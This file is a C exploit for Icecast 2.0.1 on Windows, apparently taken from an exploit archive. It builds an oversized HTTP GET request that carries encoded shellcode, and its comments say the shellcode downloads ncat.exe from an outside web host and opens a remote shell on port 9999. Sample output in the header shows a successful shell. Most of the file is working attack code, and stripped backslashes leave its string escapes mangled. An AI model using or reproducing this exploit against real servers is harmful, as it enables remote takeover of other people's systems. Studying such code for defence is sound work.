568.c

1. /*
2.  
3. by Luigi Auriemma
4.  
5. Shellcode add-on by Delikon
6. www.Delikon.de
7.  
8. Because of all the forbidden bytes in a http get request
9. i had to use a very small shellcode, which was blown up
10. by Msf::Encoder::PexAlphaNum. Great encoder.
11. -------------------------------------------------------------------------
12. C:>iceexec 127.0.0.1
13.  
14. Icecast <= 2.0.1 Win32 remote code execution 0.1
15. by Luigi Auriemma
16. e-mail: [email protected]
17. web:http://aluigi.altervista.org
18.  
19. shellcode add-on by Delikon
20. www.delikon.de
21.  
22. - target 127.0.0.1:8000
23. - send malformed data
24.  
25. Server IS vulnerable!!!
26.  
27.  
28. C:>nc 127.0.0.1 9999
29. Microsoft Windows XP [Version 5.1.2600]
30. (C) Copyright 1985-2001 Microsoft Corp.
31.  
32. C:Icecast2 Win32>
33. ---------------------------------------------------------------------------
34.  
35.  
36. */
37.  
38. #include <stdio.h>
39. #include <stdlib.h>
40. #include <string.h>
41.  
42. #ifdef WIN32
43. #pragma comment(lib, "ws2_32.lib")
44.     #include <winsock.h>
45.     #include "winerr.h"
46.  
47.     #define close closesocket
48. #else
49. //    #include <winsock.h>
50.     #include <unistd.h>
51.     #include <sys/socket.h>
52.     #include <sys/types.h>
53.     #include <arpa/inet.h>
54.     #include <netdb.h>
55.     #include <netinet/in.h>
56.     #include <sys/time.h>   //new
57. #endif
58.  
59. #define WIN32_LEAN_AND_MEAN   //new
60.  
61. #define VER "0.1"
62. #define PORT 8000
63. #define BUFFSZ 2048 //
64. #define TIMEOUT 3
65. #define EXEC "GET / HTTP/1.0rn"\
66.                 "arn" "arn" "arn" "arn" "arn" "arn" "arn" "arn"\
67.                 "arn" "arn" "arn" "arn" "arn" "arn" "arn" "arn"\
68.                 "arn" "arn" "arn" "arn" "arn" "arn" "arn" "arn"\
69.                 "arn" "arn" "arn" "arn" "arn" "arn" "arn"\
70.                 "xcc"
71. //web download and execution shellcode
72. //which downloads http://www.elitehaven.net/ncat.exe
73. //this ncat spwans a shell on port 9999
74. char shellcode[] = "xEB"
75. "x03x59xEBx05xE8xF8xFFxFFxFFx4Fx49x49x49x49x49x49x51x5Ax56x54"
76. "x58x36x33x30x56x58x34x41x30x42x36x48x48x30x42x33x30x42x43x56"
77. "x58x32x42x44x42x48x34x41x32x41x44x30x41x44x54x42x44x51x42x30"
78. "x41x44x41x56x58x34x5Ax38x42x44x4Ax4Fx4Dx49x4Ex4Ex4Cx42x30x42"
79. "x50x42x50x4Fx35x4Ax4Ex48x55x42x50x42x30x42x50x49x48x43x4Cx42"
80. "x45x4Ax46x50x58x50x34x50x50x4Ex4Ex4Ax4Ex42x36x42x50x42x30x42"
81. "x30x41x43x49x4Cx48x56x49x4Bx4Fx36x50x46x41x55x4Ax56x45x57x44"
82. "x57x4Ex36x4Dx46x46x55x4Fx4Fx42x4Dx42x45x4Ax46x48x43x4Cx41x4F"
83. "x32x42x57x4Ax4Ex48x44x42x50x42x30x42x30x41x43x49x4Cx41x55x41"
84. "x35x4Dx48x47x53x48x55x4Dx38x47x47x4Ax50x48x35x41x35x4Fx4Fx42"
85. "x4Dx43x55x4Ax56x4Ax59x50x4Fx4Cx38x50x30x4Ax4Ex4Dx32x42x50x42"
86. "x30x42x30x41x55x47x35x4Fx4Fx42x4Dx41x53x49x4Cx49x34x44x4Ex50"
87. "x4Fx43x35x4Ax46x50x37x4Ax4Dx44x4Ex43x47x4Ax4Ex49x41x42x30x42"
88. "x50x42x30x4Fx4Fx42x4Dx45x55x48x55x46x46x41x4Ax42x53x42x30x42"
89. "x30x42x30x4Bx48x42x44x4Ex30x4Bx58x42x37x4Ex51x4Dx4Ax4Bx48x4A"
90. "x56x4Ax30x49x58x4Ax4Ex50x45x4Dx55x43x4Cx43x35x45x45x48x55x47"
91. "x35x4Bx48x4Ex46x46x42x4Ax31x4Bx58x45x54x4Ex33x4Bx58x46x35x45"
92. "x30x4Ax57x41x50x4Cx4Ex4Bx38x4Cx34x4Ax41x4Bx58x4Cx55x42x52x41"
93. "x50x4Bx4Ex43x4Ex45x43x49x54x4Bx48x46x53x4Bx48x41x50x50x4Ex41"
94. "x53x4Fx4Fx4Ex4Fx41x43x42x4Cx4Ex4Ax4Ax43x42x4Ex46x37x47x50x41"
95. "x4Cx4Fx4Cx4Dx50x41x30x47x4Cx4Bx4Ex44x4Fx4Bx33x4Ex37x46x52x46"
96. "x51x45x47x41x4Ex4Bx48x4Cx35x46x42x41x50x4Bx4Ex48x56x4Bx58x4E"
97. "x50x4Bx44x4Bx58x4Cx55x4Ex31x41x30x4Bx4Ex4Bx48x46x50x4Bx58x41"
98. "x30x4Ax4Ex49x4Ex44x30x42x50x42x50x42x50x41x53x42x4Cx49x58x4C"
99. "x4Ex4Fx55x50x35x4Dx45x4Bx55x43x4Cx4Ax4Ex4Fx42x4Fx4Fx4Fx4Fx4F"
100. "x4Fx4Dx36x4Ax46x4Ax56x50x52x45x56x4Ax57x45x46x42x30x4Ax56x46"
101. "x47x46x57x42x57x4Cx43x4Fx42x4Fx32x47x47x47x47x47x47x50x42x45"
102. "x36x4Ex56x49x36x46x57x45x56x4Ax36x41x36x48x57x45x36x50x56x50"
103. "x32x50x46x45x36x46x47x4Fx42x50x46x43x36x41x56x46x37x50x32x45"
104. "x36x4Ax37x45x46x42x50x5A";
105.  
106.  
107. /*
108. in my example 0xcc is used to interrupt the code execution, you must
109. put your shellcode exactly there.
110. You don't need to call a shellcode offset (CALL ESP, JMP ESP and so
111. on) or doing any other annoying operation because the code flow
112. points directly there!!!
113. Cool and easy 8-)
114. */
115.  
116.  
117.  
118. #ifdef WIN32
119. int startWinsock(void)
120. {
121.   WSADATA wsa;
122.   return WSAStartup(MAKEWORD(2,0),&wsa);
123. }
124. #endif
125.  
126.  
127. int timeout(int sock);  //
128.  
129.  
130. __u_long resolv(char *host);   //
131.  
132.  
133.  
134. void std_err(void);
135.  
136. int main(int argc, char *argv[]) {
137.     struct sockaddr_in peer;    //
138.     int sd;
139.     __u_short port = PORT;  //
140.     __u_char buff[BUFFSZ];   //
141.  
142.  char buf[4096];  //
143.  char *pointer=NULL;  //
144.  
145.  
146.     setbuf(stdout, NULL);
147.  
148. //    fputs("\n"
149. //        "Icecast <= 2.0.1 Win32 remote code execution  
150. //        "by Luigi Auriemman\n"
151. //        "e-mail: [email protected]"
152. //        "web:http://aluigi.altervista.orgn"
153. //  "nshellcode add-on by Delikonn"
154. //  "www.delikon.de"
155. //        "n", stdout);
156.  
157.     if(argc < 2) {
158.         printf("Usage: %s <server> [port(%d)]\n", argv[0], PORT);
159.         exit(1);
160.     }
161.  
162. #ifdef WIN32
163.  
164.     startWinsock();
165. #endif
166.  
167.     if(argc > 2) port = atoi(argv[2]);
168.  
169.     peer.sin_addr.s_addr = resolv(argv[1]);
170.     peer.sin_port= htons(port);
171.     peer.sin_family= AF_INET;
172.  
173.     memset(buf,0x00,sizeof(buf));
174.     strcpy(buf,EXEC);
175.    
176. pointer =strrchr(buf,0xcc);
177.  
178. strcpy(pointer,shellcode);
179.  
180. strcat(buf,"rn");
181. strcat(buf,"rn");
182.    
183.  
184.     printf("n- target %s:%hun",
185.         inet_ntoa(peer.sin_addr), port);
186.  
187.     sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
188.     if(sd < 0) std_err();
189.  
190.     if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
191.       < 0) std_err();
192.  
193.     fputs("- send malformed datan", stdout);
194.     if(send(sd, buf, strlen(buf), 0)
195.       < 0) std_err();
196.  
197.     if((timeout(sd) < 0) || (recv(sd, buff, BUFFSZ, 0) < 0)) {      //
198.         fputs("nServer IS vulnerable!!!nn", stdout);
199.     } else {
200.         fputs("nServer doesn't seem vulnerablenn", stdout);
201.     }
202.  
203.     close(sd);
204.     return(0);
205. }
206.  
207. int timeout(int sock) {
208.     struct timeval tout;   //
209.     fd_set fd_read;      //
210.     int err;
211.  
212.     tout.tv_sec = TIMEOUT;
213.     tout.tv_usec = 0;
214.     FD_ZERO(&fd_read);
215.     FD_SET(sock, &fd_read);
216.     err = select(sock + 1, &fd_read, NULL, NULL, &tout);
217.     if(err < 0) std_err();
218.     if(!err) return(-1);
219.     return(0);
220. }
221.  
222. __u_long resolv(char *host) {    //
223.     struct hostent *hp;
224.     __u_long host_ip;      //
225.  
226.     host_ip = inet_addr(host);
227.     if(host_ip == INADDR_NONE) {
228.         hp = gethostbyname(host);
229.         if(!hp) {
230.             printf("nError: Unable to resolve hostname (%s)n", host);
231.             exit(1);
232.         } else host_ip = *(__u_long *)(hp->h_addr_list[0]);   //
233.     }
234.     return(host_ip);
235. }
236.  
237. #ifndef WIN32
238.     void std_err(void) {
239.         perror("nError");
240.         exit(1);
241.     }
242. #endif
243.  
244. // milw0rm.com [2004-10-06]
245.